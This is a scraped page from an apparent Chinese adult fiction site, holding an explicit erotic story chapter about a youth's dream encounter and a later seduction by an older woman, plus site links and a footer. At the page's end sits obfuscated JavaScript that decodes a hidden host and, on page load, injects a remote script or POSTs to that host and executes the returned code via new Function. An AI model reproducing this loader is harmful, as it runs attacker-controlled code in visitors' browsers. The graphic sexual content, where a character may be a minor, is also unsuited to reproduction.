返回

云雨春情2153

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com



(3)
日有所思,果然夜有所梦。
何小甘在熟睡中,他作了一个蝴蝶梦。
有一天,他与彭吉利、吹牛等一伙人相伴去爬山,入夜后大家在一处背风的山腰上扎营。
也许路途劳累不久大家便呼呼入睡。
小甘是守清晨四点钟的营,此时已是破晓时分,他觉得天快亮了,台湾的山区内也不可能有兇猛的野兽。
早晨的空气清新,雾气凝结在山谷内,仍冉红的火球慢慢的爬昇,光芒穿透云雾,景色实在很美。
心旷神怡之际,小甘彷彿听到有女子从近处发出嘻笑的声音。
他寻着声音的地方走去。
经过一片夹竹林,眼前是一片绿油油的草原,一条小溪蜿蜒而过,草丘之上竟然有一户住家,小甘看到门前有一位女子拉着一头小羊。
「奇怪?这里怎么有人家?」
他好奇的走过去,此时那女子也看到他走近。
「啊…」
两人都觉得惊讶不已。
原来这名女子长得跟洪阿姐一模一样,除了皮肤较红润外,她简直就是洪阿姐。
「小甘,快过来帮我拉羊吧!」
小甘愣了一下,她竟然知道自己叫小甘?莫非她真是的洪阿姐。
「啊!妳…妳是洪阿姐?」
何小甘半信半疑。
「不错,我是妳的阿姐,来…快来。」
洪阿姐娇娇滴滴的声音,使他不由自主的走过去。
「小甘,阿姐是个仙女,知道你要来此,所以事先盖了这座别馆,专候你的大驾。」
洪阿姐细细的手拉着小甘。
「唔…阿姐是仙女,小甘喜欢阿姐。」
「阿姐更喜欢你。」
何小甘帮忙把小羊拉到外面吃草。
阿姐立刻取了一个小碗,她蹲下来专心的挤着羊奶。
阿姐穿着一件绵套裙,纱的质薄得让他可以看到阿姐里面的胴体。
阿姐没有穿内衣。
看到羊奶他想起阿姐的奶。
阿姐的奶又肥又满,他很想蹲下来挤阿姐的奶,但阿姐的奶会有奶水吗?
阿姐挤满了一碗羊奶,逕自把它喝了,然后迅速又挤了第二碗,然后起身将那碗羊奶水递给小甘。
「唔…好姐姐…小甘不敢喝。」
阿姐说:「小甘,这是一头仙羊,阿姐靠牠的奶水养颜美容,你喝了它会有意想不到的好处。」
「真的?」
「嗯!你看阿姐漂不漂亮?」
阿姐说着,她把身上的长服脱掉,裸胸露腿的站在何小甘的面前。
「啊…」
何小甘何曾见过如此曼妙的女人,她的胴体简直无瑕可击,充满着女人的性感媚力。
「洪阿姐…妳…好…美…」
「那快喝啦!」
何小甘依言喝下那碗羊奶。
果然他的身体有些异样,觉得精神特别好,性慾也特别强。
洪阿姐走过来,她的手在小甘的下体摸了又摸,并嘟着小嘴吻了他一下。
小甘全身像触电似的一阵麻热,那底下的小弟也马上起了生理反应。
洪阿姐把他的裤子拉下来。
她娇媚地说:「小甘,阿姐可没有骗你,你看你的这个东西变得好大,唔…」
洪阿姐爱不释手的在他的鸡巴上摸了又摸。何小甘低下头来一看,果然他的那根大鸡巴确实比平常硬起来的时候要大约一倍,长度也比平常长了三分之一左右。
这羊奶水质是有奇妙的效力。
「阿姐!妳套得我鸡巴好舒服,以后要阿姐常给我奶水喝,常给我舒服。」
「咯…咯…」
阿姐娇笑起来,她笑的好媚,笑的好淫,几乎整个山谷都听得到似的。
「阿姐不但要给你舒服,也要小甘给阿姐快乐。」
何小甘心想,自己可能是上辈子修来的福气,否则怎会遇上如此美丽的仙女。
既然洪阿姐这么主动,我何小甘当然不能畏缩,阿姐对我这么好,我也要给她舒服才对!
不过何小甘怕给彭吉利和吹牛等人知道,于是他对洪阿姐说:「阿姐,小甘好难为情,我…我怕同伴会知道,有损阿姐的名节。」
洪阿姐继续把他的上衣脱掉。
「天知地知你知我知,别忘了阿姐是仙女,你现在身处仙境,你的同伴是看不到、听不到的。」
洪阿姐迷人的气息深深地打动他的心。
何小甘知道他己身在仙境,仙女说只有天知地知你知我知,因此他大胆的与阿姐亲热。
小甘双手放在她的蛇腰上,不停的将手往下滑摸着阿姐的大肥臀。
阿姐的大肥臀左右上下的扭动着。
「嗯…嗯…嗯…」
洪阿姐被吻得娇喘连连,她的玉手不停的在小甘的下体搓挪着他的大鸡巴。
大鸡巴硬得像铁棒,顶着洪阿姐的肚皮上。
两人互吻一阵后,何小甘把她放倒在草坪上。
洪阿姐的双脚被小甘分开成四十五度,两腿曲立双脚着地。
何小甘趴在她的身旁,他先用手拨开洪阿姐的嫩穴。
嫩穴内被小甘摸了几下后,淫水不停的往外洩。
饱满的阴丘上一片毛草,小甘在阴阜上搔了一阵。
「啊…小甘哥哥…大丈夫…亲爷爷…大…鸡巴…唔…阿姐…要…」
「唔…用力…唉…」
洪阿姐很快的意乱情迷起来,双眉深锁。
何小甘把她的两腿抬高,跪在她的大腿之间,手环抱着她的大屁股,那根大鸡巴顶着阿姐的穴口。
正準备插穴,洪阿姐娇喘着:「大鸡…巴…阿姐喜…欢…唔…要轻点…」
想不到阿姐这么喜欢挨插又怕痛。
他怜香惜玉的轻探了几下,鸡巴没有进去,不过阿姐却不断的叫:「快…大鸡巴…唔…姐姐要…啊…快进来…」
她自己用手握着大鸡巴猛向嫩穴推拉。
何小甘看看自己的阳具,说真的挺吓人的,它比平常要粗长许多,小甘还有些担心洪阿姐会吃不消呢?
难怪阿姐央求他要轻一点。
少年人血气方刚,那堪洪阿姐这副娇模样的挑逗。
「啾!」
小甘探了几下不进,又见洪阿姐急得娇嗔如怩,索性身体下沈用力一顶,鸡巴终于钻进去了。
「啊…嗯…痛…」
小甘此时也不管了,他用力的抽插了几下,阿姐便不再叫痛了。
「卜滋!卜滋!卜滋!」
洪阿姐的淫水增多了,两片阴唇死命的咬着大鸡巴,因此淫水便连连作响。
「啊…噢…舒服…哎唷…用力…阿姐…没命…啦…嗯…大丈夫…好哥哥…亲弟弟…雪…雪…」
洪阿姐经过小甘猛力的狂抽终于渐入佳境不再喊疼,反而舒服的狂叫。
她双手紧搂着何小甘,红唇微启,香汗淋漓,一副淫蕩的表现。
一对奶球在他的推动下像两朵水莲非常性感。
何小甘一边干,也不忘低下头来用嘴去叼着阿姐那两粒乳头。
「啊…嗯…嗯…嗯…」
小甘把阿姐翻过来,整个人将她压在下面,鸡巴从后面深入嫩穴,又是一轮猛插。
「啾啾!咕…咕…卜…滋…卜滋…」
淫水不停的流,洪阿姐不断的浪叫。
想不到平常端庄的洪阿姐,床上功夫竟然是如此的骚浪,原来女人大同小异,何小甘干得不亦乐乎。
又是一阵卜滋卜滋!
何小甘的大鸡巴已开始热麻,他汗流夹背毫不放鬆。
现在小甘将自己的两腿放在阿姐的两腿之间,阿姐的两条粉腿左右开弓,更方便于何小甘的抽插。
小甘顶了又顶,插了又插,洪阿姐只有拼命的叫。
她的手趴在地上,侧着头享受着嫩穴挨插的奇妙感觉。
「嗯…亲爱…的…大鸡巴…真会插…阿姐要天天…让鸡…巴哥…哥…插浪…穴…浪穴…好痒…唔…」
小甘插了一阵后,让洪阿姐採高跪姿,自己依然从后面狠命的插。
「卜滋!卜滋!」
「唉哟…唉哟…雪…」
小甘突然觉得鸡巴一阵麻热,身体突然抖了几下,原来他已经忍不住嫩穴的夹合。
「啊…啊…啊…」
何小甘抓着她的浪臀,终于忍不住的洩精了,洪阿姐也在此时猛摇肥臀。
她娇嗔连连无力的趴在草地上,一动也不动。小甘更是有气无力的压在她的软绵绵的裸体上。
此时,何小甘被一阵呼唤声叫醒,他揉揉惺忪的双眼,才知道方才作了一场甜美的梦。
原来妈妈带着古阿姐在叫他吃晚饭,妈妈并希望小甘陪古姐姐出去买些日用品,小甘也未推辞。
小甘也不再多穿衣服,就这样白运动短裤,白运动衫,就跟古阿姐走,到了巷口,叫来了计程车。
古阿姐与小甘坐进计程车后,古阿姐对司机说:「快乐大厦!」
小甘现在聪明了,真的是不经一事,不长一智。事实告诉他,现在是古阿姐看上了自己的大鸡巴。既然如此,自己奇货可居,何不假装傻傻的不懂人事,看古阿姐如何诱惑自己。
果然才坐进计程车,古阿姐就火急了。
她的玉手已摸着小甘的大腿,说:「小甘,讨厌阿姐吗?」
「没有呀!」
古阿姐的作风大胆,摸着小甘的大腿,顺势往上摸,已摸着了小甘的大鸡巴,虽然隔着裤子,还是感到美妙无比。
大概有司机在场,古阿姐不敢进一步的行动。
小甘跟玉妈妈,玩过大鸡巴插小穴穴的游戏,对女人已经知道如何应付,他现在表现出侷促不安的样子,伸手轻拉着她说:「古阿姐…」
「嗯…」
古阿姐在嗯声中,娇躯更挨近了小甘。
把一半的乳房,贴在小甘身上了,小甘这才发现,古阿姐有对大乳房。她虽然穿着乳罩,但小甘可以感觉出她的大乳房是货真价实的,他装出有点不安的说:「古阿姐,我有点儿害怕。」
「怕什么?」
「…」
「早上就不怕,为什么?」
终于快乐大厦到了,古阿姐把小甘叫下车,付了车资,小甘跟着古阿姐走到电梯,只见她按了八楼。
「古阿姐,这里没有东西可买呀!」
「有呀!」
「阿姐要买什么?」
「买你呀!」
「我?」
「对!阿姐今天就买小甘你。」
「古阿姐爱说笑,我爸和妈也绝不把我卖出去。」
「阿姐买你的心。」
「我的心…?」
到了八楼,电悌停了,两人走了出来,是公寓大楼,一层层的,像火柴盒一样的排列的很整齐。
古阿姐由皮包里拿出钥匙,开了门,说:「进去!」
小甘早已知古阿姐玩什么鬼花样,但还是假装莫名其妙,又好奇的样子问:「阿姐,这是谁的家?」
「我俩的家。」
「我俩?什么我俩?」
「就是你小甘和古阿姐的家,何必多问,进去!」
小甘跟她进屋内。
当古阿姐把房门锁好之后,已经十万火急的抱着小甘,热吻起来了。
现在,小甘开始做戏表演起来。
他被这一团火,这火辣辣性感的胴体所抱,有说不出来的舒服,但还是假装着害怕的样子,急声说:「阿姐,不可以,我怕、我怕怕。」
古阿姐顿了一下,停下来。
「怕什么?」
「妳…妳是阿姐呀!」
小甘也懂得说鬼话了,其实他也慾火中烧了,他的大鸡巴贴在古阿姐那肥厚的肉丘上,胸膛又被她的两个大乳房贴住。双手又搂着她的细腰,已经是温香满怀,美女在抱了。
尤其是古阿姐,已抹了香水。香水味与她的体香,混合成一股幽幽诱人的香味,小甘早被薰得魂飞九霄云外了。
这瞬间,古阿姐突然领悟了一件事,「玩这种游戏,不能急,要慢慢来先培养气氛,到了适当的程度,水到渠成。」
古阿姐娇滴滴道:「小甘。来,坐下!」
他被古阿姐拉到沙发上坐下,古阿姐又说:「小甘,喝可乐好吗?」
小甘想了一下,说:「可乐不好。」
「那喝什么呢?」
「酒。」
「小甘,你也会喝酒?」
「不会。」
「那你要喝酒干嘛?」
「壮胆呀!」
妙语双关,听得古阿姐芳心大喜道:「可惜,下午阿姐租好这间公寓之后,忘了买酒,只买可乐,你将就点好了,喝可乐,下次我再买酒。」
「嗯…」
现在,小甘可要好好的欣赏这位阿姐了。
古阿姐全身充满着性感,充满着性的诱惑,前胸是两个特大号的乳房,腰围细得如柳,臀部很丰满。
走起路来,丰臀微摆,左右摆动中,可把人的眼珠摆得昏头转向。
她婷婷玉立的向小甘走来。
为小甘倒了杯可乐,娇滴滴道:「小甘,你喝可乐,阿姐去换衣服。」
「妳有衣服在这里?」
「租好了后买的。」
小甘突然大为感叹,古阿姐不失为巾帼英雄,当机立断,有魄力,说做即做,自己和她比较,差太多了。
一下子,古阿姐回到客厅。
「小甘,在家里穿得这么整齐,太不舒服了,把衣服脱掉。」
「脱…掉?」
「是呀!把上衣、运动裤脱掉,不是舒服多了吗?」
「嗯…也好!」
小甘边脱衣服,边看古阿姐,有点儿失望。
她穿的又不是什么薄纱的睡袍,只是一件很普通的家常便服,钮釦排在中间的,要说性感的话,只有下面两个钮釦没扣好,把那雪白粉嫩,细腻极了的大腿露出来而已,又没见到三角裤。
但这样,已令小甘心跳如战鼓了。
小甘只剩下一条内裤了。
呀!
古阿姐把一边的大乳房,贴上小甘的背膀,是没戴乳罩,货真价实的大乳房,小甘已如坐在云端,飘飘欲仙了。
那股嗲劲,还真令人受不了。
古阿姐并没有忘记伸出她的玉手,去摸抚小甘的胸膛,轻轻摸抚着,像一阵轻风在小甘的胸膛上吹似的。
小甘被摸得慾火高炽,他说:「古阿姐,妳要小甘怎样?」
「要你的心。」
「我的心怎样?」
「要你真心对待阿姐。」
古阿姐的手,已摸向肚脐,往下摸了。
「要怎样真心?」
「嗯…嗯…连这个你都要人家说,你那里算是男人。」
她的手已握着了大鸡巴。
小甘身心俱抖。
更妙的是,古阿姐双腿展开了。
呀?
露出了毛茸茸的阴阜,她并没有穿三角裤,斯可忍执不可忍,小甘怎能受得了,早已伸出魔掌,探向那美丽的三角洲,摸着毛茸茸的神秘草原。
「唔…唔…小甘…我的小甘…」
古阿姐轻轻的发抖,秀眼儿已经细玻谙硎苄「誓行缘难舾铡

评分
相关推荐
3.0分

3.0分 【云雨春情】【完】79a

3.0分

3.0分 云雨春情2-乱伦小说29b

3.0分

3.0分 云雨之情5be

3.0分

3.0分 巫山云雨情e54

3.0分

3.0分 云雨风云录957

3.0分

3.0分 恩爱云雨251

3.0分

3.0分 巫山云雨811

3.0分

3.0分 巫山云雨811

3.0分

3.0分 云雨风云录作者不详24f

3.0分

3.0分 巫山云雨完5ec

3.0分

3.0分 舞春云2c1

3.0分

3.0分 舞春云2c1

3.0分

3.0分 覆雨翻云外传163

3.0分

3.0分 练习室中的云雨601

3.0分

3.0分 练习室中的云雨601

3.0分

3.0分 母子乾坤,蚊帐云雨ffd


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};